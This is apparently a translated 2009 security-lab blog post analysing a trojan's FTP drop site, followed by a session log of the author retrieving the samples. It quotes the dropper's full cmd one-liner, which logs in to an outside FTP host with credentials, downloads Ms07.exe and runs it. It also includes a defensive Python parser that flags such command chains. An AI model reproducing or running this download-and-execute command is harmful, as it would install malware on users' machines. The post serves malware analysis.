Blast's Security Lab
1 Aug 2009
I just stumbled upon a trojan's FTP drop site; the script that calls it is
cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe
Obviously, its intent is to
open v1.usbupdatestrings.at (port 4356)
user name ik ik ;; note the space inside the user name
password binary
fetch Ms07.exe
close the FTP connection
run Ms07.exe
So, to save effort, I used IE and typed ftp://ik ik:binary@v1.usbupdatestrings.at:4356/ directly. But as soon as I hit Enter the URL became ik%20ik:binary@v1.usbupdatestrings.at:4356/, because Internet Explorer URL-encodes the address automatically, especially when it contains spaces, so the account could not possibly match. So we do what the trojan does: call FTP.EXE from CMD.EXE and simply follow its commands shown above.
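As an added example (not code from the original post), here is a small Python parser for a logged command line of this shape: it rebuilds the script file from the echo chain, reads it the way ftp.exe reads an -s: script (the line after user answers the password prompt, which is why the password here is "binary"), and flags the case where a fetched file is executed afterwards. The sample command line and its host name are constructed placeholders.

```python
import re
# Constructed sample mirroring the dropper's echo chain (placeholder host, not a real indicator)
SAMPLE_CMDLINE = (
    "cmd /c echo open malicious.example 4356 > i&echo user ik ik >> i "
    "&echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe"
)
ECHO_RE = re.compile(r"echo\s+(.*?)\s*>>?\s*([^\s&|]+)", re.IGNORECASE)  # echo text > file
FTP_SCRIPT_RE = re.compile(r"\bftp\b[^&|]*-s:(\S+)", re.IGNORECASE)    # ftp ... -s:file

def reconstruct_ftp_script(cmdline):
    """Rebuild the script that `ftp -n -s:<file>` will read from the echo chain."""
    m = FTP_SCRIPT_RE.search(cmdline)
    if not m:
        return None
    script_file = m.group(1)
    lines = [text for text, target in ECHO_RE.findall(cmdline) if target == script_file]
    return lines or None

def interpret_ftp_script(lines):
    """Read the script as ftp.exe does: the line after `user` answers the password prompt."""
    info = {"host": None, "port": 21, "user": None, "password": None, "files": []}
    i = 0
    while i < len(lines):
        parts = lines[i].split()
        cmd = parts[0].lower() if parts else ""
        if cmd == "open" and len(parts) >= 2:
            info["host"] = parts[1]
            if len(parts) >= 3 and parts[2].isdigit():
                info["port"] = int(parts[2])
        elif cmd == "user":
            # everything after "user" is the name, embedded spaces included ("ik ik")
            info["user"] = lines[i][len(parts[0]):].strip()
            if i + 1 < len(lines):
                info["password"] = lines[i + 1]
                i += 1
        elif cmd in ("get", "mget") and len(parts) >= 2:
            info["files"].extend(parts[1:])
        i += 1
    return info

def analyse_dropper_cmdline(cmdline):
    """Extract the FTP details and flag a fetched file that is then executed."""
    lines = reconstruct_ftp_script(cmdline)
    if lines is None:
        return None
    info = interpret_ftp_script(lines)
    tail = cmdline[FTP_SCRIPT_RE.search(cmdline).end():].lower()  # text after ftp -s:file
    info["executed"] = [f for f in info["files"] if f.lower() in tail]
    info["suspicious"] = bool(info["host"] and info["executed"])
    return info
```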
ftp> dir
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
drw-rw-rw- 1 user group 0 Jul 27 16:38 .
drw-rw-rw- 1 user group 0 Jul 27 16:38 ..
-rw-rw-rw- 1 user group 114688 Jul 27 16:38 ms07.exe
-rw-rw-rw- 1 user group 114688 Jul 27 16:37 ms12.exe
-rw-rw-rw- 1 user group 114688 Jul 27 16:38 ms12x.exe
226 Transfer complete.
ftp: 收到 313 字节,用时 0.02Seconds 19.56Kbytes/sec.
ftp> get ms12.exe
200 PORT Command successful.
150 Opening BINARY mode data connection for ms12.exe (114688 Bytes).
> ftp: get :对方将连接复位
ftp> get ms12x.exe
Not connected.
ftp> user ik ik
Not connected.
ftp> open v1.usbupdatestrings.at 4356
Connected to v1.usbupdatestrings.at.
220-Serv-U FTP Server v5.0 for WinSock ready...
220-.:::::::::::::::::::::::::::::::::::::::::::::::::.
220-.::::|
220-.::::| o0o-====== pe[ro =======-o0o
220-.::::|________________________________________
220-.:::::::::::::::::::::::::::::::::::::::::::::::::.
220-.::::|
220-.::::| o0o-========= USER STATS =========-o0o
220-.::::|
220-.::::| You are Connecting From 60.*.*.0 (my IP, masked)
220-.::::| 144 users have visited in the last 24 hours
220-.::::| This server has been running for
220-.::::|0 Days, 3 Hours, 53 Mins, 58 Secs
220-.::::|
220-.::::|Amout of Logins Since Server Started: 137 total
220-.::::| o0o-======== SERVER STATS ========-o0o
220-.::::|
220-.::::| Logged in Users: 1
220-.::::| Total Kb downloaded: 13680 Kb
220-.::::| Total Kb uploaded: 0 Kb
220-.::::| Amout of Files downloaded: 122
220-.::::| Amout of Files uploaded: 0
220-.::::| Average Speed: 0.975 Kb/sec
220-.::::| Current Speed: 0.000 Kb/sec
220-.::::| Free Disk Space: 114079.87 MB
220-.::::|________________________________________
220 .:::::::::::::::::::::::::::::::::::::::::::::
User (v1.usbupdatestrings.at:(none)): user ik ik
331 User name okay, need password.
Password:
530 Not logged in.
Login failed.
ftp> user ik ik
331 User name okay, need password.
230 User logged in, proceed.
ftp> binary
200 Type set to I.
ftp> get ms12.exe
200 PORT Command successful.
150 Opening BINARY mode data connection for ms12.exe (114688 Bytes).
226 Transfer complete.
ftp: 收到 114688 字节,用时 11.22Seconds 10.22Kbytes/sec.
ftp> get ms12x.exe
200 PORT Command successful.
150 Opening BINARY mode data connection for ms12x.exe (114688 Bytes).
226 Transfer complete.
ftp: 收到 114688 字节,用时 22.06Seconds 5.20Kbytes/sec.
ftp> bye
221 Goodbye!
That downloaded all of its files. Judging by its infection count, though, "144 users have visited in the last 24 hours", it does not seem like much; I once watched the statistics of a domestic host where the hit count grew by one every 1.5 seconds on average, so you can imagine the number of infections... In any case, I learned one thing: don't use IE to access a site whose user name or password contains a space.